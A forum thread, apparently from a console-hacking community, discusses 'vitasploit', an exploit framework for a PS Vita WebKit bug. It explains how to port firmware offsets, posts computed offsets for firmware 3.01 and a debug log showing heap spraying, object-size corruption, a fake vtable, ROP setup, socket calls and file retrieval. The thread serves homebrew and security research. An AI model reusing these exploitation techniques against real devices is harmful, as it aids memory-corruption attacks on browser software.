vitasploit - Exploitation Framework

[tomtomdu80]

this is the best thing the exploit has:

Code: Select all

//libkernel_mem_test("mem", SCE_KERNEL_MEMBLOCK_TYPE_USER_RW, 0x1000);

it'll allow in the end for the attacker to go to the kernel memory range, 0x81000000.

I don't really think sony would allow you to read/write the kmem just by using a syscall like that

Advertising

[addddd]

how to find offsets for other firmwares?

Code: Select all

ver_offsets = {
		v3_00:{
	            scewkbase_off : 0x3d73a9,
	            scelibcentry_off: 0x6c4718, 

I looked it in module import table, but there no similar addresses. May be I need add or subtract some base address?

Advertising

[Hykem]

Thanks for all the support! BBalling1 and tomtomdu80 are now part of the project as well so "vitasploit" is now our common workplace for all public code regarding the exploit. This will avoid having several repositories scattered around and should provide a more clean way to distribute new findings to other researchers.

I don't know what you mean by this but 1) kernel is < 0x40000000 (technically it can be anywhere 0 to 0xffffffff but this is a reasonable assumption for now), 2) 0x81000000 is the default base before aslr, and 3) memalloc returns only user memory.

regarding 2), can you explain me this? https://github.com/DHrpcs3/rpcs3/blob/m ... y.cpp#L135

Someone making an educated guess?

That was indeed an educated guess taken by DH.
Regarding that memory test, it obviously can't access the kernel memory space. Although the functions come from SceLibKernel (which may have sparked some confusion) all they do is allocate and free memory in the user area (whence the "TYPE_USER_RW" designation in the macro).
The main advantage in using this over the manual memory allocation method is the memory block types. We can ask the Vita to allocate memory contiguously for example. This may be useful in the future to store code payloads for further exploitation without messing too much with memory areas.

how to find offsets for other firmwares?

Code: Select all

ver_offsets = {
		v3_00:{
	            scewkbase_off : 0x3d73a9,
	            scelibcentry_off: 0x6c4718, 

I looked it in module import table, but there no similar addresses. May be I need add or subtract some base address?

To find the offsets under different firmwares there are a few steps to follow:
- Run the tool in memory reading/writing mode and take note of the "leaked ptr" value. This is the memory pointer that gets leaked from SceWebKit and will be used as reference for the rest of the code;
- Find SceWebKit module manually using the "scanm" command on several addresses (use the ones from previous firmwares as references, since it should reside closely to them);
- "scewkbase_off" is now [leaked pointer address] - [SceWebKit module base address] (e.g.: 0x81DD73A9 - 0x81A00000 = 0x3D73A9);
- To resolve the offsets of the other libraries you must find them manually using "scanm". This will find modules in the memory and print out crucial information on them. You have to take note of each module's entry point;
- Disassemble SceWebKit module and search the code for each module's entry point address. You should find it being loaded like this:

Code: Select all

0x820C139C:
MOV             R12, #0x8110FAFD (SceLibc entry point address)
BX              R12

Now look in SceWebKit's import module table for the reference to this routine:

Code: Select all

0x820C4718:
DCD sub_820C139C

"sceXXXXXentry_off" is the offset inside WebKit where you find the import for each module, so it should be equal to [pointer to module entry point address] - [SceWebKit base address] (e.g.: 0x820C4718 - 0x81A00000 = 0x6C4718 for SceLibc);
- The last part is sceXXXXXbase_off which is simply the offset of each module's entry point inside themselves, which means [module entry point address] - [module base address] (e.g.: 0x8110FAFD - 0x81100000 = 0xFAFD for SceLibc);
- Don't bother with "elementvtable_off" and "setscrollleft_off" because it's very likely that these JavaScript objects reside always at the same offsets.

As you can see this is merely a way to find an automatic path to each module using SceWebKit as reference.
You may also need to build a new ROP chain in case the available gadgets reside at different offsets or are simply not available (like in 3.00 firmware, which required a different ROP chain for code execution).
I hope this helps, but feel free to contact me if you have any doubts.

[addddd]

Thanks for explanations! On firmware 3.01 I got values:

Code: Select all

Leaked ptr: 0x81dd73a9
sceWebKit Base address: 0x81a00000

SceLibc
void ** func_entry_tab = 0x820c4718
MOV             R12, #0x8110FAFD
Base address: 0x81100000

SceNet
void ** func_entry_tab = 0x820c46e4
MOV             R12, #0xE01D52D9
Base address: 0xe01d3000

SceLibKernel
void ** func_entry_tab = 0x820c46f4
MOV             R12, #0xE000B291
Base address: 0xe0003000

and calculated offsets are:

Code: Select all

        v3_01:{
            scewkbase_off : 0x3d73a9, //[leaked pointer address] - [SceWebKit module base address]
            scelibcentry_off: 0x6c4718, //[pointer to module entry point address] - [SceWebKit base address]
            scelibnetentry_off: 0x6c46e4,
            scekernentry_off: 0x6c46f4,
            scekernbase_off: 0x8291, //[module entry point address] - [module base address]
            scelibcbase_off: 0xfafd,
            scelibnetbase_off: 0x22d9,
            elementvtable_off: -0x68, //
            setscrollleft_off: 0x5b
        },

other values got from 3.00
[spoiler][+] DBG: Initialization
[+] DBG: Spraying ArrayBuffers...
[+] DBG: Done spraying
[+] DBG: Searching for ArrayBuffer signature...
[+] DBG: ...
[+] DBG: Found ArrayBuffer signature at u32[0x5c0c] -> 0x8a22c538
[+] DBG: Spraying Elements...
[+] DBG: Done spraying
[+] DBG: Searching for Element signature...
[+] DBG: ...
[+] DBG: Found Element signature at u32[0x5b56]
[+] DBG: Changing size of Element object: 0x66656463 -> 0x55555555
[+] DBG: Looking for modified Element object...
[+] DBG: Found modified Element object at esprays[0x8]
[+] DBG: Changing size of object: 0xabc0 -> 0xdeadbabe
[+] DBG: Looking for modified object...
[+] DBG: Found modified object at sprays[0xace]
[+] DBG: Address of u32: 0x82ad8a40
[+] DBG: Base of u32: 0x82ad8610
[+] DBG: Vtab of u32: 0x82234444
[+] DBG: Leaked ptr: 0x81dd73a9
[+] DBG: SceWebKit base: 0x81a00000
[+] DBG: SceLibc base: 0x81100000
[+] DBG: SceNet base: 0xe01d3000
[+] DBG: SceLibKernel base: 0xe0003000

[+] DBG: Element vtable pointer at: 0x82aef300
[+] DBG: Element vtable at: 0x822b22f0
[+] DBG: Fake vtable at: 0x826d8610
[+] DBG: Copying vtable...

[+] DBG: Module UIDs:
826DE610 6F010140 69010140 59010140 4D010140 o..@i..@Y..@M..@
826DE620 47010140 31010140 2D010140 25010140 G..@1..@-..@%..@
826DE630 23000140 21000140 1F000140 1D000140 #..@!..@...@...@
826DE640 1B000140 19000140 17000140 15000140 ...@...@...@...@
826DE650 13000140 11000140 0F000140 0D000140 ...@...@...@...@
826DE660 0B000140 01000140 ...@...@

[+] DBG: Found module: SceWebKit
[+] DBG: Module segment info: #0
[+] DBG: Module segment vaddr: 0x81a00000
[+] DBG: Module segment memsz: 0x8ea860
[+] DBG: Module segment info: #1
[+] DBG: Module segment vaddr: 0x81188000
[+] DBG: Module segment memsz: 0xc7cc
[+] DBG: Error: Bad module segment!
[+] DBG: Found module: SceHafnium
[+] DBG: Module segment info: #0
[+] DBG: Module segment vaddr: 0x81880000
[+] DBG: Module segment memsz: 0x56668
[+] DBG: Module segment info: #1
[+] DBG: Module segment vaddr: 0x8103e000
[+] DBG: Module segment memsz: 0x54
[+] DBG: Error: Bad module segment!
[+] DBG: Found module: ScePsp2Compat
[+] DBG: Module segment info: #0
[+] DBG: Module segment vaddr: 0x81200000
[+] DBG: Module segment memsz: 0x3b0a70
[+] DBG: Module segment info: #1
[+] DBG: Module segment vaddr: 0x81168000
[+] DBG: Module segment memsz: 0xb944
[+] DBG: Error: Bad module segment!
[+] DBG: Found module: SceWebFiltering
[+] DBG: Module segment info: #0
[+] DBG: Module segment vaddr: 0x81158000
[+] DBG: Module segment memsz: 0x5920
[+] DBG: Module segment info: #1
[+] DBG: Module segment vaddr: 0x81160000
[+] DBG: Module segment memsz: 0x4d64
[+] DBG: Error: Bad module segment!
[+] DBG: Found module: SceLibVitaJSExtObj
[+] DBG: Module segment info: #0
[+] DBG: Module segment vaddr: 0x810cc000
[+] DBG: Module segment memsz: 0x4d3c
[+] DBG: Module segment info: #1
[+] DBG: Module segment vaddr: 0x8103d000
[+] DBG: Module segment memsz: 0x78
[+] DBG: Error: Bad module segment!
[+] DBG: Found module: SceLibHttp
[+] DBG: Module segment info: #0
[+] DBG: Module segment vaddr: 0xe05e0000
[+] DBG: Module segment memsz: 0x1c440
[+] DBG: Module segment info: #1
[+] DBG: Module segment vaddr: 0xe004b000
[+] DBG: Module segment memsz: 0x630
[+] DBG: Error: Bad module segment!
[+] DBG: Found module: SceLibNetCtl
[+] DBG: Module segment info: #0
[+] DBG: Module segment vaddr: 0xe01eb000
[+] DBG: Module segment memsz: 0x7aae
[+] DBG: Module segment info: #1
[+] DBG: Module segment vaddr: 0xe004c000
[+] DBG: Module segment memsz: 0x1400
[+] DBG: Error: Bad module segment!
[+] DBG: Found module: SceNet
[+] DBG: Module segment info: #0
[+] DBG: Module segment vaddr: 0xe01d3000
[+] DBG: Module segment memsz: 0xbdf0
[+] DBG: Module segment info: #1
[+] DBG: Module segment vaddr: 0xe004a000
[+] DBG: Module segment memsz: 0xc90
[+] DBG: Error: Bad module segment!
[+] DBG: Found module: SceAppUtil
[+] DBG: Module segment info: #0
[+] DBG: Module segment vaddr: 0x81090000
[+] DBG: Module segment memsz: 0x96a4
[+] DBG: Module segment info: #1
[+] DBG: Module segment vaddr: 0x81039000
[+] DBG: Module segment memsz: 0x70
[+] DBG: Error: Bad module segment!
[+] DBG: Found module: SceLibPvf
[+] DBG: Module segment info: #0
[+] DBG: Module segment vaddr: 0xe0090000
[+] DBG: Module segment memsz: 0xcf24
[+] DBG: Module segment info: #1
[+] DBG: Module segment vaddr: 0xe0027000
[+] DBG: Module segment memsz: 0x8
[+] DBG: Error: Bad module segment!
[+] DBG: Found module: SceLibft2
[+] DBG: Module segment info: #0
[+] DBG: Module segment vaddr: 0xe0108000
[+] DBG: Module segment memsz: 0x4db54
[+] DBG: Module segment info: #1
[+] DBG: Module segment vaddr: 0xe0026000
[+] DBG: Module segment memsz: 0x2f4
[+] DBG: Error: Bad module segment!
[+] DBG: Found module: SceLibDbg
[+] DBG: Module segment info: #0
[+] DBG: Module segment vaddr: 0xe0044000
[+] DBG: Module segment memsz: 0x5d4
[+] DBG: Module segment info: #1
[+] DBG: Module segment vaddr: 0xe0025000
[+] DBG: Module segment memsz: 0x8c
[+] DBG: Error: Bad module segment!
[+] DBG: Found module: SceCommonDialog
[+] DBG: Module segment info: #0
[+] DBG: Module segment vaddr: 0xe0190000
[+] DBG: Module segment memsz: 0x11108
[+] DBG: Module segment info: #1
[+] DBG: Module segment vaddr: 0xe0032000
[+] DBG: Module segment memsz: 0x289
[+] DBG: Error: Bad module segment!
[+] DBG: Found module: SceShellSvc
[+] DBG: Module segment info: #0
[+] DBG: Module segment vaddr: 0xe00d0000
[+] DBG: Module segment memsz: 0x12000
[+] DBG: Module segment info: #1
[+] DBG: Module segment vaddr: 0xe0031000
[+] DBG: Module segment memsz: 0x8e9
[+] DBG: Error: Bad module segment!
[+] DBG: Found module: SceLibc
[+] DBG: Module segment info: #0
[+] DBG: Module segment vaddr: 0x81100000
[+] DBG: Module segment memsz: 0x4d3bc
[+] DBG: Module segment info: #1
[+] DBG: Module segment vaddr: 0x8103a000
[+] DBG: Module segment memsz: 0x26f0
[+] DBG: Error: Bad module segment!
[+] DBG: Found module: SceLibFios2
[+] DBG: Module segment info: #0
[+] DBG: Module segment vaddr: 0x810a0000
[+] DBG: Module segment memsz: 0x2b12c
[+] DBG: Module segment info: #1
[+] DBG: Module segment vaddr: 0x81084000
[+] DBG: Module segment memsz: 0x523d
[+] DBG: Error: Bad module segment!
[+] DBG: Found module: SceGxm
[+] DBG: Module segment info: #0
[+] DBG: Module segment vaddr: 0xe0064000
[+] DBG: Module segment memsz: 0x1fe44
[+] DBG: Module segment info: #1
[+] DBG: Module segment vaddr: 0xe0016000
[+] DBG: Module segment memsz: 0x72c
[+] DBG: Error: Bad module segment!
[+] DBG: Found module: SceGpuEs4User
[+] DBG: Module segment info: #0
[+] DBG: Module segment vaddr: 0xe003d000
[+] DBG: Module segment memsz: 0x2844
[+] DBG: Module segment info: #1
[+] DBG: Module segment vaddr: 0xe0015000
[+] DBG: Module segment memsz: 0x3c
[+] DBG: Error: Bad module segment!
[+] DBG: Found module: SceAvcodecUser
[+] DBG: Module segment info: #0
[+] DBG: Module segment vaddr: 0xe0035000
[+] DBG: Module segment memsz: 0x2340
[+] DBG: Error: Bad module segment!
[+] DBG: Found module: SceDriverUser
[+] DBG: Module segment info: #0
[+] DBG: Module segment vaddr: 0xe0018000
[+] DBG: Module segment memsz: 0xc334
[+] DBG: Module segment info: #1
[+] DBG: Module segment vaddr: 0xe0028000
[+] DBG: Module segment memsz: 0x8f50
[+] DBG: Error: Bad module segment!
[+] DBG: Found module: SceLibKernel
[+] DBG: Module segment info: #0
[+] DBG: Module segment vaddr: 0xe0003000
[+] DBG: Module segment memsz: 0xdb58
[+] DBG: Module segment info: #1
[+] DBG: Module segment vaddr: 0xe0014000
[+] DBG: Module segment memsz: 0x50
[+] DBG: Error: Bad module segment!
[+] DBG: Found module: SceWebKitProcess
[+] DBG: Module segment info: #0
[+] DBG: Module segment vaddr: 0x81000000
[+] DBG: Module segment memsz: 0x151c0
[+] DBG: Module segment info: #1
[+] DBG: Module segment vaddr: 0x81016000
[+] DBG: Module segment memsz: 0x215cc
[+] DBG: Error: Bad module segment!
[+] DBG: SceWebKitProcess base: 0x81000000
[+] DBG: SceCommonDialog base: 0xe0190000
[+] DBG: - Memory test -
[+] DBG: Allocated memory UID: 0x40010db5
[+] DBG: Memory base pointer: 0x826deef8
[+] DBG: Freed memory UID: 0x40010db5
[+] DBG: - Socket connection test -
[+] DBG: Calling nethtons()
[+] DBG: -> 0x4e15

[+] DBG: Calling SceNetSocket()
[+] DBG: -> 0x47

[+] DBG: Calling SceNetConnect()
[+] DBG: -> 0x0

[+] DBG: Calling SceNetSend()
[+] DBG: -> 0x1b

[+] DBG: Calling SceNetClose()
[+] DBG: -> 0x0

[+] DBG: - Directory listing test -
[+] DBG: Listing: app0:
[+] DBG: eboot.bin
[+] DBG: sce_sys
[+] DBG: -

[+] DBG: Listing: app0:sce_sys/
[+] DBG: param.sfo
[+] DBG: -

[+] DBG: - File retrieval test -
[+] DBG: -> 0x1000
[+] DBG: -> 0x1000
[+] DBG: -> 0x1000
[+] DBG: -> 0x1000
[+] DBG: -> 0x1000
[+] DBG: -> 0x1000
[+] DBG: -> 0x1000
[+] DBG: -> 0x1000
[+] DBG: -> 0x1000
[+] DBG: -> 0x1000
[+] DBG: -> 0x1000
[+] DBG: -> 0x1000
[+] DBG: -> 0xd6a
-[/spoiler]
some errors appears on module dumping

[Hykem]

Thanks addddd!
So, only SceNet's offsets change. I'll add this to vitasploit.

Also, those errors can be ignored, they currently have no meaning and I'll remove them.

[Xeeynamo]

Hi, I'm doing some tests and, enabling ROP, keeps reloading index.html until a stroke of luck. It's normal? There is a way to minimize crashes?

[Hykem]

I've just updated vitasploit with support for firmware 3.01 (thanks to addddd), improved module dumping, "run" command (thanks to Mr. Netrix) and a new test for support URI calls (thanks to tomtomdu80).
The URI calls are what's used in the PKG Installer trick, so "run support_uri("psgm:open?titleid=NPXS10031")" should open the PKG Installer for example.

Hi, I'm doing some tests and, enabling ROP, keeps reloading index.html until a stroke of luck. It's normal? There is a way to minimize crashes?

Unfortunately, that's quite normal. ASLR forces us to scan the memory every time we exploit the vulnerability, so it takes a few attempts before we successfully find the modified objects.

[niszczycielnpc]

Can we only retrive files from ps vita of can we send files too?

[Xeeynamo]

Can we only retrive files from ps vita of can we send files too?

It's possible but it's useless. SceWebKit process can read only from app0, savedata0 and vs0 but it can write only on savedata0 due to its user-mode privileges. We need a kernel exploit in order to access in r/w on more partitions. Also, the current dumps saves data from RAM, not from NAND.
Correct me if I'm in wrong with something.

[niszczycielnpc]

So eboot.bin in app0 is just an eboot from website application?